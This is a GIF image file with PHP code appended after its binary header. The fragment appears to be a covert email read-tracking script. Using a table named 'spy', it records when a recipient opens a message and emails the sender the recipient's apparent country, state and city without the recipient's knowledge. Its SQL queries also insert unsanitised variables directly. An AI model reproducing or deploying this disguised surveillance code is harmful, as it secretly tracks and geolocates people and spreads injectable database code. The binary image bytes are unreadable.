GIF89a!9!0Creator: PolyView Version 3.20 by Polybytes !,W XȰ`B #.0DF,Qc,N8dȍN bA& p$H#aޜ8Q M=}blPȄ f; $ip) { $res4 = mysql_query("SELECT email FROM mails WHERE email='$mail'"); if(mysql_num_rows($res4) == 0) { $sql2 = "UPDATE spy SET status = '1' where id = '$id'"; $result2 = mysql_query($sql2,$dbh); $inhalt = " the mail you had sent to $remote was read by the recipient\n\n The recipient seems to be located in:\n Country: $var1\n State: $var2\n City: $var3 "; mail("$mail", "$remote has read the mail", "$inhalt", "From:"); } } } ?>